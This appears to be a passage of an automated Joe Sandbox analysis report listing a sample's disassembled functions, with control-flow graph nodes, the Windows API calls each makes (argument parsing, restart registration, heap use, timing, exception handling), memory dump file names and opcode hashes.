                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F29AB Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 246 5f29ab-5f29ca CommandLineToArgvW 247 5f29cc-5f29ea call 5f2a21 LocalFree 246->247 248 5f2a15 246->248 250 5f2a1a-5f2a20 247->250 252 5f29ec-5f2a03 call 5f2a21 247->252 248->250 255 5f2a08-5f2a13 RegisterApplicationRestart 252->255 256 5f2a05 252->256 255->250 256->255
                                                                            APIs
                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,?,00000001,00000000,00000000), ref: 005F29C0
                                                                            • LocalFree.KERNEL32(00000000,?), ref: 005F29DE
                                                                            • RegisterApplicationRestart.KERNELBASE(005F1428,00000000,00000000), ref: 005F2A0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: ApplicationArgvCommandFreeLineLocalRegisterRestart
                                                                            • String ID:
                                                                            • API String ID: 3182635576-0
                                                                            • Opcode ID: 7b1ea399fe2c3d7b89c60f8a651b19e98c7f499dc71cf3960556c9b22ad221c9
                                                                            • Instruction ID: 3097be8079179b5681417ccbdc2cddb4648ca500b03b3d0309362ed4452014e0
                                                                            • Opcode Fuzzy Hash: 7b1ea399fe2c3d7b89c60f8a651b19e98c7f499dc71cf3960556c9b22ad221c9
                                                                            • Instruction Fuzzy Hash: 4601527291021DBBDB11CBD5D889BBDBBACFB84361F500065E601E7141DBB89E04DAA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 005F25D3 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 211COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 258 5f25d3-5f265b memset * 2 CommandLineToArgvW 259 5f2891-5f28a1 call 5f32b0 258->259 260 5f2661-5f2667 258->260 261 5f287d-5f2886 LocalFree 260->261 262 5f266d-5f2674 260->262 261->259 264 5f2888-5f2890 261->264 265 5f2676-5f267e 262->265 266 5f2683-5f269e StrCmpNIW 262->266 264->259 265->261 268 5f26f0-5f26f9 266->268 269 5f26a0-5f26a7 266->269 271 5f26fb-5f271c call 5f1a60 PathFindExtensionW 268->271 272 5f2757-5f275f 268->272 270 5f26aa-5f26b3 269->270 270->270 273 5f26b5-5f26b9 270->273 281 5f271e-5f272e StrCmpIW 271->281 274 5f2761-5f2770 StrCmpIW 272->274 277 5f26bb-5f26bd 273->277 278 5f2736-5f273c 273->278 279 5f2785-5f27a2 274->279 280 5f2772-5f2781 274->280 283 5f26cf-5f26dd 277->283 284 5f26bf-5f26cd call 5f1b57 277->284 282 5f2877 278->282 286 5f27a8-5f27b0 279->286 287 5f2873-5f2875 279->287 280->274 285 5f2783 280->285 288 5f2741-5f2751 281->288 289 5f2730-5f2734 281->289 282->261 283->261 293 5f26e3-5f26eb 283->293 284->283 285->278 291 5f27c5-5f27e3 call 5f1a60 GetFileAttributesW 286->291 292 5f27b2-5f27b5 286->292 287->282 288->272 289->278 289->281 302 5f27e5-5f27ec 291->302 303 5f2833-5f2835 291->303 295 5f2818-5f2825 292->295 296 5f27b7-5f27be 292->296 293->261 299 5f282c-5f2831 295->299 300 5f2827-5f282a 295->300 296->295 301 5f27c0 296->301 299->261 300->291 301->291 304 5f27ee-5f27fd PathRemoveFileSpecW 302->304 305 5f2811-5f2816 302->305 306 5f2837-5f283e 303->306 307 5f2840-5f2848 303->307 304->305 308 5f27ff-5f280f GetFileAttributesW 304->308 305->282 306->305 306->307 309 5f284b-5f2854 307->309 308->303 308->305 309->309 310 5f2856-5f2871 call 5f2b60 309->310 310->282 310->287
                                                                            APIs
                                                                            • memset.MSVCRT ref: 005F261B
                                                                            • memset.MSVCRT ref: 005F2633
                                                                            • CommandLineToArgvW.SHELL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 005F264D
                                                                            • StrCmpNIW.SHLWAPI(?,/LDAP:,00000006,?,?,?,00000000,00000000,00000001), ref: 005F268D
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,00000001), ref: 005F287E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ArgvCommandFreeLineLocal
                                                                            • String ID: /LDAP:
                                                                            • API String ID: 439219084-3282177907
                                                                            • Opcode ID: abb53fcfa5b89d20268fb725b825071c0075dbc08def575d5242678a3b2df961
                                                                            • Instruction ID: af794d904e20e876967d84c9ea3b1ddbef5acc33114993491504b9c23bdb9e14
                                                                            • Opcode Fuzzy Hash: abb53fcfa5b89d20268fb725b825071c0075dbc08def575d5242678a3b2df961
                                                                            • Instruction Fuzzy Hash: 1381E2B1A4121C9BCB24DF24CC8CABABBB9FF54340F1445A9E60AD7251DB389E84CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F2A7E Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 313 5f2a7e-5f2a8c 314 5f2a8e-5f2a90 313->314 315 5f2a95-5f2aa1 313->315 316 5f2b5b-5f2b5d 314->316 317 5f2aaa 315->317 318 5f2aa3 315->318 319 5f2aac-5f2ab3 317->319 318->319 320 5f2aa5-5f2aa8 318->320 321 5f2ab7-5f2abb 319->321 322 5f2ab5 319->322 320->317 320->319 323 5f2b54 321->323 324 5f2ac1-5f2ac3 321->324 322->321 325 5f2b59-5f2b5a 323->325 324->323 326 5f2ac9-5f2add GetProcessHeap HeapAlloc 324->326 325->316 326->323 327 5f2adf-5f2ae3 326->327 328 5f2b1c-5f2b22 327->328 329 5f2ae5-5f2afd memcpy 327->329 332 5f2b2d-5f2b31 328->332 333 5f2b24-5f2b2b 328->333 330 5f2aff-5f2b06 329->330 331 5f2b0b-5f2b0f 329->331 330->330 334 5f2b08 330->334 331->332 335 5f2b11-5f2b18 331->335 336 5f2b44-5f2b52 332->336 337 5f2b33-5f2b3e GetProcessHeap HeapFree 332->337 333->332 333->333 334->331 335->335 338 5f2b1a 335->338 336->325 337->336 338->332
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(_,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?), ref: 005F2ACC
                                                                            • HeapAlloc.KERNEL32(00000000,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?,?), ref: 005F2AD3
                                                                            • memcpy.MSVCRT ref: 005F2AEB
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?,?), ref: 005F2B37
                                                                            • HeapFree.KERNEL32(00000000,?,005F2BA4,?,?,8000FFFF,00000000,?,?,?,005F286D,?,?), ref: 005F2B3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocFreememcpy
                                                                            • String ID: m(_
                                                                            • API String ID: 3405790324-432497582
                                                                            • Opcode ID: e39ed1cae2803a0a7a3b1722d7d08859abaf62cbd86e68159530bc0733eb99cd
                                                                            • Instruction ID: 9290d9c82a35f51f1af01a1357cd2bf409bda92902b3ce65d816f041a04271c2
                                                                            • Opcode Fuzzy Hash: e39ed1cae2803a0a7a3b1722d7d08859abaf62cbd86e68159530bc0733eb99cd
                                                                            • Instruction Fuzzy Hash: 4F2135F1A0060AABDB265F6DD888B35BFA9BB00310F104129EF55CB294DBBCDC04CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F3675 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 339 5f3675-5f3698 340 5f369e-5f36eb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 339->340 341 5f369a-5f369c 339->341 343 5f36ed-5f36f3 340->343 344 5f36f5-5f36fa 340->344 341->340 342 5f3702-5f370c 341->342 343->344 345 5f36fc 343->345 344->345 345->342
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005F36A2
                                                                            • GetCurrentProcessId.KERNEL32 ref: 005F36B1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 005F36BA
                                                                            • GetTickCount.KERNEL32 ref: 005F36C3
                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 005F36D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                            • String ID:
                                                                            • API String ID: 1445889803-0
                                                                            • Opcode ID: fcb5f78ef979eb74de56dccf1c8f0e11904f5d1abac2e777d5c146ede76a9cdb
                                                                            • Instruction ID: 33870cb7164832163fb9ea996ae2fa38138274a4ce41d96a3f723c6c3516163a
                                                                            • Opcode Fuzzy Hash: fcb5f78ef979eb74de56dccf1c8f0e11904f5d1abac2e777d5c146ede76a9cdb
                                                                            • Instruction Fuzzy Hash: 1D11FB71D01508EBDB10DBB8E94C6AEBBF8FF58351F510855D601EB250EA389A04DB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F32C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,005F33F6,`@_), ref: 005F32C7
                                                                            • UnhandledExceptionFilter.KERNEL32(005F33F6,?,005F33F6,`@_), ref: 005F32D0
                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,005F33F6,`@_), ref: 005F32DB
                                                                            • TerminateProcess.KERNEL32(00000000,?,005F33F6,`@_), ref: 005F32E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 3231755760-0
                                                                            • Opcode ID: 644c37bfe257f1594979400bf8628a1273b2437cd2ab19d5c9cb242f5fe66f28
                                                                            • Instruction ID: 57502252a1204bc290b372d949a6f47ce7b0d28600473535fb8a5d13f190f7a2
                                                                            • Opcode Fuzzy Hash: 644c37bfe257f1594979400bf8628a1273b2437cd2ab19d5c9cb242f5fe66f28
                                                                            • Instruction Fuzzy Hash: EDD09232000904ABDA002BA1AC0CE6A3F2DAB54312F054400B30DC6120AE398419EAA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F3450 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 005F3455
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: bcecc7ced6daa1e7f48302856093cb3b4b5c84f15d4e3660bda6a9d153eaff29
                                                                            • Instruction ID: 2774a1572d65c6204e23b80497ca3e8b2c24631dde4b4cc195eeae4603cc494a
                                                                            • Opcode Fuzzy Hash: bcecc7ced6daa1e7f48302856093cb3b4b5c84f15d4e3660bda6a9d153eaff29
                                                                            • Instruction Fuzzy Hash: 649002A0355504465B0117705C1E5252E957A5870B7820490A205C615CEE588105A555
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F3530 Relevance: 1.3, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5_
                                                                            • API String ID: 0-3184794191
                                                                            • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                            • Instruction ID: 9e2c982cb0d3899d448cc8c223c02a11d3b7bcade16eb5d37225f3ba7be1f436
                                                                            • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                            • Instruction Fuzzy Hash: B8F06C337051195F9B54CB4EDCC097EB7DAEFC47347198079E60987602DA78ED42C694
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005F2F80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 005F34D8: GetModuleHandleW.KERNEL32(00000000), ref: 005F34DF
                                                                            • __set_app_type.MSVCRT ref: 005F2F92
                                                                            • __p__fmode.MSVCRT ref: 005F2FA8
                                                                            • __p__commode.MSVCRT ref: 005F2FB6
                                                                            • __setusermatherr.MSVCRT ref: 005F2FD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005F0000, based on PE: true
                                                                            • Associated: 00000016.00000002.1972008473.00000000005F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.00000000005F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000016.00000002.1972136151.000000000060D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_5f0000_newfile.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                            • String ID:
                                                                            • API String ID: 1632413811-0
                                                                            • Opcode ID: d0a9b206912e7266b2b1870b88f2ac5ed5a50505b05396c26ab86e9b7db6273d
                                                                            • Instruction ID: 4d866c703b00546947f4fd547d460bea404adee45b0d077c9672449bcb9c57b2
                                                                            • Opcode Fuzzy Hash: d0a9b206912e7266b2b1870b88f2ac5ed5a50505b05396c26ab86e9b7db6273d
                                                                            • Instruction Fuzzy Hash: D5F0F8B4544705CFD7186B30AC0E63A3FA4F764321B104A19E662C62E5EF3D8288EE10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%